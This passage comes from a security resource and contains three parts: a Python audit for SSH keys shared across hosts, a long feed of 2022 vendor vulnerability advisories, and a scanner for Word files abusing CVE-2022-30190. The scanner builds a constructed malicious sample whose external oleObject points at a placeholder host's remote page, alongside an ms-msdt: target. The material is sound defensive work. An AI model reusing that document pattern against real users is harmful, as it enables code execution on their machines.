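    fake_pub = hashlib.sha256(b"example-pubkey-%d" % seed).digest()
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(fake_pub)
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


# Constructed inventory: hostname -> contents of /root/.ssh/authorized_keys as collected.
# Key 1 is the shared agent key planted on every host; key 2 is a per-host admin key.
INVENTORY: Dict[str, str] = {
    "batch-01": "\n".join([make_ed25519_line(1, "opcon-agent"), make_ed25519_line(2, "admin@ops")]),
    "batch-02": "\n".join(["# managed file", "", make_ed25519_line(1, "opcon-agent")]),
    "batch-03": 'command="/usr/local/bin/agent",no-pty ' + make_ed25519_line(1, "opcon-agent"),
}


def fingerprint(blob_b64: str) -> str:
    """OpenSSH SHA256 fingerprint: unpadded base64 of SHA-256 over the raw key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[str]:
    """Return the fingerprints of every key in an authorized_keys file, skipping
    comments and blank lines and tolerating a leading options field. Limitation:
    an options field with whitespace inside a quoted value is not handled."""
    fingerprints: List[str] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        for index, token in enumerate(fields):
            if token in KEY_TYPES and index + 1 < len(fields):
                fingerprints.append(fingerprint(fields[index + 1]))
                break
    return fingerprints


def find_shared_keys(inventory: Dict[str, str], min_hosts: int = 2) -> Dict[str, List[str]]:
    """Map each fingerprint trusted on at least min_hosts hosts to those hosts."""
    hosts_by_fp: Dict[str, List[str]] = defaultdict(list)
    for host, text in inventory.items():
        for fp in set(parse_authorized_keys(text)):
            hosts_by_fp[fp].append(host)
    return {fp: sorted(hosts) for fp, hosts in hosts_by_fp.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for fp, hosts in find_shared_keys(INVENTORY).items():
        print(f"{fp} trusted for root on {len(hosts)} hosts: {', '.join(hosts)}")
```

A key that legitimately belongs on every host (a configuration-management deploy key, for
example) will show up the same way, so the output is a review list rather than an alert; the
question for each shared fingerprint is whether the matching private key is unique to your
organisation or ships inside a product, as it did here.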
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
QNAP has released security updates to resolve a vulnerability in PHP that affects its NAS
operating systems. Successful exploitation can cause Remote Code Execution (RCE). The
affected products are QTS 5.0.x and later, QTS 4.5.x and later, QuTS hero h5.0.x and later,
QuTS hero h4.5.x and later and QuTScloud c5.0.x and later. CVE ID: CVE-2019-11043 (High)
OpenSSL has released security updates to resolve a command injection vulnerability in the
c_rehash script that can cause the execution of arbitrary commands with the privileges of
the script. This vulnerability affects OpenSSL versions 1.0.2, 1.1.1 and 3.0.
CVE ID: CVE-2022-2068 (Medium)
Foxit has released an updated Foxit PhantomPDF 10.1.8 to resolve multiple vulnerabilities in
Foxit PhantomPDF version 10.1.7.37777 and earlier versions.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in Yokogawa STARDOM. An attacker can exploit
these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-29519 (Medium), CVE-2022-30997 (Medium)
Spring has released security updates to address SpEL Injection vulnerability through
annotated query methods with SpEL expressions in Spring Data MongoDB application. The
affected products are Spring Data MongoDB 3.4.0, 3.3.0 to 3.3.4 and older, unsupported
versions. CVE ID: CVE-2022-22980
Ubuntu has released security updates to resolve multiple vulnerabilities in Intel Microcode.
An attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2021-0127 (Medium), CVE-2021-0145 (Medium), CVE-2021-0146 (Medium),
CVE-2021-33117 (Medium), CVE-2021-33120 (Medium), CVE-2022-21123, CVE-2022-21127,
CVE-2022-21151 (Medium), CVE-2022-21166
Huawei has released security update to address an input verification vulnerability in Huawei
printers. Successful exploitation of this vulnerability can cause device service exceptions.
CVE ID: CVE-2022-34159 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Microsoft has announced that it will remove Basic authentication in Exchange Online for
Exchange ActiveSync (EAS), POP, IMAP, Remote PowerShell, Exchange Web Services (EWS),
Offline Address Book (OAB), Outlook for Windows, and Mac. All organisations are urged to
expedite migration to Modern Authentication ("Modern Auth") before Microsoft begins
permanently disabling Basic Auth on October 1, 2022, for all protocols. This decision
requires customers to move from apps that use basic authentication to apps that use Modern
authentication.
FastJson has released a security update to resolve a vulnerability in its package before
1.2.83 which allows attackers to bypass the "AutoTypeCheck" mechanism and achieve Remote
Code Execution (RCE) in FastJson. CVE ID: CVE-2022-25845 (Critical)
WordPress has released security updates to resolve a sensitive information disclosure
vulnerability in GiveWP – Donation Plugin and Fundraising Platform plugins. The affected
versions are GiveWP – Donation Plugin and Fundraising Platform plugins versions up to, and
including, 2.20.2. CVE ID: CVE-2022-2117 (Medium)
Google has released Dev channel 104.0.5112.14 for Windows, Mac & Linux, Chrome Beta 104
(104.0.5112.8) for iOS, Dev channel 104.0.5112.12 for Mac & Linux and 104.0.5112.14 for
Windows, and Chrome Dev 104 (104.0.5112.10) for Android.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Ubuntu has released security updates to address multiple vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-21123, CVE-2022-21125, CVE-2022-21166
HP has released a security update to address a vulnerability that allows unauthorized
modification of certain files in HP ThinPro 7.2 Service Pack 8 (SP8), affecting its thin
client products. HP has released Service Pack 10 (SP10) to remediate the vulnerability.
CVE ID: CVE-2022-1602 (Medium)
Dell has released security updates for Dell EMC PowerScale OneFS to address multiple
vulnerabilities that can be exploited by malicious users to compromise the affected
system. CVE ID: CVE-2022-31229 (Critical), CVE-2022-31230 (High)
Multiple vulnerabilities have been discovered in AutomationDirect equipment- DirectLOGIC
with Ethernet Communication Modules that can cause a loss of sensitive information,
unauthorised changes and a Denial of Service (DoS) condition. The mitigations are
available. CVE ID: CVE-2022-2004 (High), CVE-2022-2003 (High)
AutomationDirect has released security updates to resolve a vulnerability which can cause
cleartext transmission of sensitive information in its Equipment- DirectLOGIC with Serial
Communication. CVE ID: CVE-2022-2003 (High)
AutomationDirect has released security updates to address multiple vulnerabilities in its
Equipment- C-more EA9 HMI that can cause a loss of sensitive information and allow code
execution with elevated privileges. CVE ID: CVE-2022-2006 (High), CVE-2022-2005 (High)
Multiple vulnerabilities have been discovered in Hillrom Medical Equipment- Welch Allyn
medical devices. Successful exploitation of these vulnerabilities can allow an attacker to
compromise software security by executing commands, gaining privileges, reading sensitive
information, evading detection, etc. CVE ID: CVE-2022-26388 (Medium), CVE-2022-26389 (High)
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in the WordPress
plugin Button Widget Smartsoft. The affected products are Button Widget Smartsoft versions
up to, and including, 1.0.1. CVE ID: CVE-2022-1912 (High)
WordPress has released security updates to resolve a vulnerability in Wbcom Designs –
BuddyPress Group Reviews plugins. The affected versions are Wbcom Designs – BuddyPress Group
Reviews plugins versions up to, and including, 2.8.3. CVE ID: CVE-2022-2108 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
A Remote Code Execution (RCE) vulnerability has been discovered in the web-based management
interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers that could allow
an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to
restart unexpectedly, resulting in a Denial of Service (DoS) condition. Cisco will not
release software updates as these routers have entered the end-of-life process.
CVE ID: CVE-2022-20825 (Critical)
Cisco released a security update to resolve an authentication bypass vulnerability in Cisco
Secure Email & Web Manager that can cause an unauthenticated remote attacker to bypass
authentication and log in to the web management interface of an affected device. CVE ID: CVE-2022-20798 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-31626, CVE-2022-31625
Google has released updated Stable channel 102.0.5005.125 (Platform version: 14695.107.0)
for most ChromeOS devices, Beta channel 103.0.5060.53 for Windows, Mac & Linux, Dev channel
104.0.5110.0 for Windows, Mac & Linux, and Chrome Beta 103 (103.0.5060.53) for Android.
Synaptics has released security updates to address a vulnerability in Synaptics Fingerprint
drivers that use SGX that can cause Denial of Service (DoS) and information disclosure.
CVE ID: CVE-2021-3675
Spring has released a security update to address a Denial of Service (DoS) vulnerability in
Spring Cloud Function 3.2.5 and prior versions. CVE ID: CVE-2022-22979 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Cisco has released security updates and workarounds to resolve multiple vulnerabilities in
its products. CVE ID: CVE-2022-20733, CVE-2022-20736, CVE-2022-20817, CVE-2022-20819,
CVE-2022-20664
A vulnerability has been discovered in AMD processors where frequency scaling may allow an
authenticated attacker to execute a timing attack and potentially disclose information.
CVE ID: CVE-2022-23823
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows Network File System. CVE ID: CVE-2022-30136 (Critical)
Zoom has released security updates to resolve insufficient authorisation check and DLL
injection vulnerabilities in its platform. An attacker can exploit these vulnerabilities to
take control of an affected system. CVE ID: CVE-2022-28749 (Medium), CVE-2022-22788 (High)
Hitachi Energy has released a security update to resolve a vulnerability in the Actbar2.ocx
module used by Hitachi Energy's equipment- PROMOD IV. An attacker who successfully exploits
this vulnerability can delete arbitrary files once the system is compromised.
CVE ID: CVE-2010-3591 (Critical)
Microsoft has released updates to address multiple vulnerabilities in its software. An
attacker can exploit these vulnerabilities to take control of an affected system.
Adobe has released security updates to address vulnerabilities in its products. An attacker
can exploit these vulnerabilities to take control of an affected system.
Citrix has released security updates to address multiple vulnerabilities in Application
Delivery Management (Citrix ADM). An attacker can exploit these vulnerabilities to take
control of an affected system. CVE ID: CVE-2022-27511, CVE-2022-27512
Johnson Controls has released security updates to resolve Unverified Password Change and
Cross-site Scripting vulnerabilities in its Equipment- Metasys ADS/ADX/OAS Servers.
Successful exploitation of these vulnerabilities can allow unauthorized users to compromise
passwords and inject malicious code into web interfaces.
CVE ID: CVE-2022-21935 (High), CVE-2022-21937 (High), CVE-2022-21938 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Meridian Cooperative has released security update to address an Improper Access Control
vulnerability in its Equipment- Meridian. Successful exploitation of this vulnerability can
result in a disclosure of sensitive information. CVE ID: CVE-2022-29578 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Intel products. An attacker can exploit
these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-24436 (Medium), CVE-2022-21180 (Medium), CVE-2022-21123 (medium),
CVE-2022-21125 (medium), CVE-2022-21127 (medium), CVE-2022-21166 (medium)
SAP has released security updates to address vulnerabilities affecting multiple products. An
attacker can exploit these vulnerabilities to take control of an affected system.
A Denial of Service (DoS) vulnerability has been discovered in Mitsubishi Electric's
Equipment- MELSEC-Q and L series CPU modules. A malicious attacker can cause a DoS condition
in ethernet communications by sending a specially crafted packet. CVE ID: CVE-2022-24946 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
SUSE has released security updates to resolve a path traversal vulnerability in
rubygem-sinatra. The affected product is SUSE OpenStack Cloud Crowbar 8. CVE ID: CVE-2022-29970 (High)
Multiple vulnerabilities have been discovered in the Trendnet TEW-831DR WiFi Router. Trendnet
has released security updates for some of these vulnerabilities.
CVE ID: CVE-2022-30325 (Medium), CVE-2022-30326 (Medium), CVE-2022-30327 (High),
CVE-2022-30328 (Medium), CVE-2022-30329 (Medium)
Debian has released security updates to address multiple vulnerabilities in the VLC media
player, which can result in the execution of arbitrary code or Denial of Service (DoS) if a
malformed media file is opened. CVE ID: CVE-2020-26664 (High)
A Stored Cross-Site Scripting (XSS) vulnerability has been discovered in Mitsol Social Post
Feed WordPress plugins versions up to and including 1.10. CVE ID: CVE-2022-0209 (Medium)
Drupal uses third-party Guzzle library for handling HTTP requests and responses to external
services. Guzzle has released security updates to resolve multiple vulnerabilities which
affect some contributed projects or custom code on Drupal sites. CVE ID: CVE-2022-31042 (High), CVE-2022-31043
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Moxa has released a security update to resolve multiple out-of-bounds write vulnerabilities
in Moxa's equipment- NPort 5110 Series Firmware Version 2.10.
A vulnerability in the Data Distribution Service (DDS) software component has been discovered
in Medtronic's Valleylab FX8 and FT10 energy platforms. Medtronic has released a security
update for Valleylab FX8 and a mitigation for the Valleylab FT10 energy platform to address
the vulnerability. CVE ID: CVE-2021-43547 (High)
Google has released Chrome Dev 104 (104.0.5108.0) for Android, Extended Stable channel
102.0.5005.115 for Windows & Mac, Chrome Beta 103 (103.0.5060.42) for iOS and Stable
channel 102.0.5005.115 for Windows, Mac & Linux to resolve multiple
vulnerabilities. CVE ID: CVE-2022-2007 (High), CVE-2022-2008 (High), CVE-2022-2010 (High),
CVE-2022-2011 (High)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Dell has released security updates to address multiple vulnerabilities in Dell SupportAssist
for Home PCs and Business PCs that can be exploited by malicious users to compromise the
affected system. CVE ID: CVE-2022-29092 (High), CVE-2022-29093 (High), CVE-2022-29094 (High),
CVE-2022-29095 (High)
Apache has released security updates for its HTTP Server to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-26377, CVE-2022-28330, CVE-2022-28614, CVE-2022-29404,
CVE-2022-30522, CVE-2022-30556, CVE-2022-31813
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in ToolBar to Share
WordPress plugins versions up to and including 2.0.
CVE ID: CVE-2022-1918 (High)
It has been discovered that Festo controller CECC-X-M1 product family in multiple versions
are affected by multiple preauthentication command injection vulnerabilities. Any person who
is able to gain access to the webserver can run arbitrary system commands on the device with
root privileges.
CVE ID: CVE-2022-30308 (Critical), CVE-2022-30309 (Critical), CVE-2022-30310
(Critical), CVE-2022-30311 (Critical)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Google has released Beta channel 103.0.5060.42 for Windows, Mac and Linux, Beta channel
103.0.5060.37 (Platform version: 14816.49.0) for most ChromeOS devices, and Chrome Beta 103
(103.0.5060.42) for Android.
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in Copify WordPress
plugins versions up to, and including, 1.3.0. CVE ID: CVE-2022-1900 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released a security update to resolve an improper authentication vulnerability in
Dell iDRAC9. Successful exploitation can give an attacker access to the VNC console. The
affected products are iDRAC9 versions 5.00.00.00 and later but before 5.10.10.00. CVE ID: CVE-2022-24422 (Critical)
Google has released the Android security bulletin to resolve multiple vulnerabilities affecting
several Android devices. Security patch levels of 2022-06-05 or later address all of these issues.
CVE ID: CVE-2022-20130 (Critical), CVE-2022-20127 (Critical), CVE-2022-20140
(Critical), CVE-2022-20145 (Critical), CVE-2022-20210 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1304 (High), CVE-2022-30787, CVE-2022-30784 (Medium), CVE-2022-30783
(Medium), CVE-2022-30788 (Medium), CVE-2022-30789 (Medium), CVE-2022-30786 (Medium),
CVE-2022-30785 (Medium), CVE-2022-30790
NVIDIA has released a security update to resolve multiple vulnerabilities in the NVIDIA DGX
A100 firmware, which can lead to information disclosure, Denial of Service (DoS), or
escalation of privileges. CVE ID: CVE-2022-28200 (High), CVE-2022-31599 (High), CVE-2022-31600 (High),
CVE-2022-31601 (Medium), CVE-2022-31602 (Medium), CVE-2022-31603 (Medium)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in the encrypted communications of Mitsubishi
Electric air conditioning systems that can cause information disclosure, information
tampering and Denial of Service (DoS). The mitigations are available. CVE ID: CVE-2022-24296 (Low), CVE-2016-2183 (High), CVE-2013-2566 (Medium),
CVE-2015-2808 (Medium), CVE-2009-3555 (High)
A password-guessing vulnerability in Zyxel GS1200 series switches and a CRLF injection
vulnerability in Zyxel legacy firewalls have been discovered. The mitigations are available.
Owl Labs has released security updates to address a vulnerability in Meeting Owl Pro which
can cause disclosure of sensitive information. CVE ID: CVE-2022-31460
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
SUSE has released security updates to resolve multiple vulnerabilities in the Linux
kernel. CVE ID: CVE-2022-30594 (High), CVE-2022-1048 (High)
Huawei has released security updates to address an improper input verification vulnerability
and a command injection vulnerability in its products. Successful exploitation can lead to
abnormal service behaviour and to the highest privileges on the printer, respectively. CVE ID: CVE-2022-32203 (Critical), CVE-2022-32204 (High)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CODESYS has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1989 (High), CVE-2022-1794 (High), CVE-2022-30791 (Medium),
CVE-2022-30792 (Medium), CVE-2021-21863 (High), CVE-2021-21864 (High), CVE-2021-21865
(High), CVE-2021-21866 (High), CVE-2021-21867 (High), CVE-2021-21868 (High), CVE-2021-21869
(High)
Arbitrary out-of-bounds write and buffer overflow vulnerabilities have been discovered in
U-Boot. CVE ID: CVE-2022-30790 (Critical), CVE-2022-30552 (High)
Multiple vulnerabilities have been discovered in Dominion Voting Systems Democracy Suite
ImageCast X, which is an in-person voting system used to allow voters to mark their
ballot. CVE ID: CVE-2022-1739, CVE-2022-1740, CVE-2022-1741, CVE-2022-1742, CVE-2022-1743,
CVE-2022-1744, CVE-2022-1745, CVE-2022-1746, CVE-2022-1747
Dell has released security updates to address multiple vulnerabilities in its products that
can be exploited by malicious users to compromise the affected system.
Google has released Dev channel 104.0.5098.0 for Windows, Mac and Linux, Chrome Beta 103
(103.0.5060.34) for iOS, and Chrome Dev 104 (104.0.5097.3) for Android.
Yokogawa has released a security update to address a vulnerability in its Wide Area
Communication Router (WAC Router). If the WAC Router receives malformed packets in a DoS
attack, the functions it provides can stop.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
A reflected Cross-Site Scripting vulnerability in the Download Manager WordPress plugin and a
stored Cross-Site Scripting vulnerability in the Ultimate Member WordPress plugin have been
discovered. The updates are available. CVE ID: CVE-2022-1985 (Medium), CVE-2022-1208 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
An unauthenticated remote code execution vulnerability has been discovered in Atlassian
Confluence Server and Data Center. CVE ID: CVE-2022-26134 (Critical)
Illumina has released a security update to resolve multiple vulnerabilities in Illumina's
Local Run Manager (LRM). Successful exploitation of these vulnerabilities can allow an
unauthenticated malicious actor to take control of the affected product remotely and take
any action at the operating system level. CVE ID: CVE-2022-1517 (Critical), CVE-2022-1518 (Critical), CVE-2022-1519 (Critical),
CVE-2022-1521 (Critical), CVE-2022-1524 (High)
Multiple vulnerabilities, including protection mechanism failure, forced browsing, classic
buffer overflow, path traversal and OS command injection, have been discovered in HID Mercury
access panels sold by Carrier's LenelS2. An attacker can exploit these vulnerabilities to take
control of an affected system. CVE ID: CVE-2022-31479 (Critical), CVE-2022-31480 (High), CVE-2022-31481 (Critical),
CVE-2022-31482 (High), CVE-2022-31483 (Critical), CVE-2022-31484 (High), CVE-2022-31485
(Medium), CVE-2022-31486 (High)
Mitsubishi Electric has released security updates to resolve a vulnerability, caused by
improper input validation, that can lead to Denial of Service (DoS) or remote code execution in
the MELSEC-Q Series, MELSEC-L Series and MELSEC iQ-R Series. A remote unauthenticated attacker
can cause a DoS condition or execute malicious code on target products by sending specially
crafted packets. CVE ID: CVE-2022-25163 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
The Mobile browser color select plugin for WordPress is vulnerable to Cross-Site Request
Forgery. This vulnerability can allow unauthenticated attackers to inject malicious web scripts
via a forged request, provided they can trick a site administrator into performing an action
such as clicking on a link. CVE ID: CVE-2022-1969 (High)
Mozilla has released a security update to address a SQL injection vulnerability in Firefox for
iOS 101. An attacker can exploit this vulnerability to take control of an affected
system. CVE ID: CVE-2022-1887 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-22965 (Critical), CVE-2022-20742 (High), CVE-2022-20715 (High),
CVE-2022-20759 (High), CVE-2022-20745 (High), CVE-2022-20737 (High),
CVE-2022-20760 (High), CVE-2022-20774 (Medium), CVE-2022-20821 (Medium)
Huawei has released a security update to address an insufficient input verification
vulnerability in Huawei products. Successful exploitation of this vulnerability can lead to
abnormal service behaviour. CVE ID: CVE-2022-32144 (High)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
91.10, Firefox 101, and Firefox ESR 91.10. An attacker can exploit these vulnerabilities to
take control of an affected system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities, including insufficient session expiration and not using password
aging, have been discovered in Becton, Dickinson and Company's Synapsys and Pyxis products. An
attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-22767 (High), CVE-2022-30277 (Medium)
A stored Cross-Site Scripting (XSS) vulnerability in the Google Tag Manager for WordPress
(GTM4WP) plugin and a Cross-Site Request Forgery vulnerability in the WPMK Ajax Finder
WordPress plugin have been discovered. Updates are available for Google Tag Manager for
WordPress (GTM4WP). CVE ID: CVE-2022-1961 (Medium), CVE-2022-1749 (High)
A stack-based buffer overflow vulnerability has been discovered in Fuji Electric's Alpha7 PC
Loader. Successful exploitation of this vulnerability can allow arbitrary code
execution. CVE ID: CVE-2022-1888 (High)
Dell has released a security update for Dell EMC Unisphere Central to address multiple
third-party component vulnerabilities that can be exploited by malicious users to compromise
the affected system. CVE ID: CVE-2021-44832 (Medium), CVE-2022-22720 (Critical), CVE-2022-22721 (Critical)
A remote code execution vulnerability has been discovered in Windows when Microsoft Support
Diagnostic Tool (MSDT) is called using the URL protocol from a calling application such as
Word. An attacker who successfully exploits this vulnerability can run arbitrary code with
the privileges of the calling application. CVE ID: CVE-2022-30190 (High)
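A triage check for documents that abuse this path, added here as an example (it is not Microsoft's guidance and not code from this page): public analyses of CVE-2022-30190 samples showed the Word document carrying an external oleObject relationship pointing at a remote HTML page, which in turn invoked the ms-msdt: URL scheme. The scanner below opens an Office Open XML container and flags any relationship that is external but not an ordinary hyperlink, and any target using the ms-msdt: scheme. The two sample documents are constructed in memory; the host 198.51.100.7, the relationship IDs and the ms-msdt:/placeholder target are placeholders, not real exploit content.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Added example: heuristic triage of Office Open XML containers for the relationship
# pattern seen in public CVE-2022-30190 samples. Not Microsoft's detection logic.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
HYPERLINK_TYPE = OFFICE_REL + "hyperlink"
SUSPICIOUS_SCHEMES = {"ms-msdt"}   # the URL protocol the advisory describes


def scan_ooxml(data: bytes) -> list:
    """Return one finding per suspicious relationship in a docx/xlsx/pptx byte string."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "")
                external = rel.get("TargetMode", "Internal").lower() == "external"
                scheme = urlsplit(target).scheme.lower()
                if scheme in SUSPICIOUS_SCHEMES:
                    reason = "target uses the %s: scheme" % scheme
                elif external and rel_type != HYPERLINK_TYPE:
                    # An external oleObject target is fetched when the document is
                    # rendered; a plain hyperlink needs a click, so it is not flagged.
                    reason = "external non-hyperlink relationship"
                else:
                    continue
                findings.append({"part": name, "id": rel.get("Id"),
                                 "type": rel_type.rsplit("/", 1)[-1],
                                 "target": target, "reason": reason})
    return findings


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal constructed .docx container around the given relationships part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


RELS_OPEN = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">' % REL_NS

# Constructed samples: a document with only a clickable link, and one with an external
# oleObject plus a direct ms-msdt: target. 198.51.100.7 is a documentation address.
BENIGN_DOCX = build_docx(
    RELS_OPEN
    + '<Relationship Id="rId1" Type="%shyperlink" Target="https://example.com/" TargetMode="External"/>' % OFFICE_REL
    + "</Relationships>")
SUSPECT_DOCX = build_docx(
    RELS_OPEN
    + '<Relationship Id="rId5" Type="%soleObject" Target="http://198.51.100.7/stage.html!" TargetMode="External"/>' % OFFICE_REL
    + '<Relationship Id="rId6" Type="%shyperlink" Target="ms-msdt:/placeholder" TargetMode="External"/>' % OFFICE_REL
    + "</Relationships>")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOCX), ("suspect", SUSPECT_DOCX)):
        for f in scan_ooxml(doc):
            print(label, f["part"], f["id"], f["type"], f["reason"], f["target"])
```

Run it over a mail gateway's quarantine or a share of recent .docx files by passing each file's bytes to scan_ooxml(); a hit is a reason to detonate the document, not proof of exploitation, since legitimate documents can embed remote OLE content.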
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1664, CVE-2022-27406 (High), CVE-2021-46790 (Critical),
CVE-2019-13050 (High)
Data breach/falsification and resource exhaustion vulnerabilities have been discovered in
CAMS for HIS. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Ubuntu has released security updates to address multiple vulnerabilities in Subversion
servers. The affected release is Ubuntu 22.04 LTS. CVE ID: CVE-2021-28544 (Medium), CVE-2022-24070 (High)
Red Hat has released security updates to address multiple vulnerabilities in several
products. CVE ID: CVE-2022-1529 (Critical), CVE-2022-1802 (Critical)
Multiple vulnerabilities have been discovered in Keysight Technologies' N6854A Geolocation
Server and N6841A RF Sensor software. Successful exploitation of these vulnerabilities can
allow an attacker to obtain arbitrary operating system files and execute arbitrary
code. CVE ID: CVE-2022-1661 (High), CVE-2022-1660 (Critical)
Horner Automation has released a security update to resolve multiple vulnerabilities in
Horner Automation's Cscape Csfont. Successful exploitation can lead to the execution of
arbitrary code when a malicious file is opened. CVE ID: CVE-2022-27184 (High), CVE-2022-28690 (High), CVE-2022-29488 (High),
CVE-2022-30540 (High)
Google has released updated Chrome 103 Beta channel 103.0.5060.24 & Dev channel 104.0.5083.0
for Windows, Mac and Linux, Beta channel 103.0.5060.22 (Platform version: 14816.25.0) for
most ChromeOS devices and Chrome Dev 104 (104.0.5082.0) & Chrome Beta 103 (103.0.5060.22)
for Android.
QNAP has released security updates to address a Cross-Site Request Forgery (CSRF)
vulnerability in QNAP NAS devices running Proxy Server that allows remote attackers to inject
malicious code. CVE ID: CVE-2021-34360 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Citrix has released security updates to address multiple vulnerabilities in Citrix ADC and
Citrix Gateway that can result in a Denial of Service (DoS). CVE ID: CVE-2022-27507 (Medium), CVE-2022-27508 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Red Hat has released security updates to address multiple vulnerabilities in several
products. CVE ID: CVE-2018-25032 (High), CVE-2022-1271 (High), CVE-2022-1677 (Medium)
Google has released Chrome Dev 103 (103.0.5060.22) & Chrome 102 (102.0.5005.58,
102.0.5005.59) for Android, Chrome 102 stable channel 102.0.5005.61 for Mac and Linux, and
Chrome 102 (102.0.5005.67) for iOS to resolve multiple vulnerabilities. CVE ID: CVE-2022-1853 (Critical)
An uncontrolled resource consumption vulnerability has been discovered in Rockwell
Automation's Logix Controllers. An unauthorized user can cause a Denial of Service (DoS)
condition by sending malicious messages. The mitigations are available. CVE ID: CVE-2022-1797 (Medium)
An improper access control vulnerability has been discovered in Matrikon OPC Server.
Successful exploitation can result in Remote Command Execution (RCE) with system-level
privileges through the product's support for the IPersistFile COM interface. The
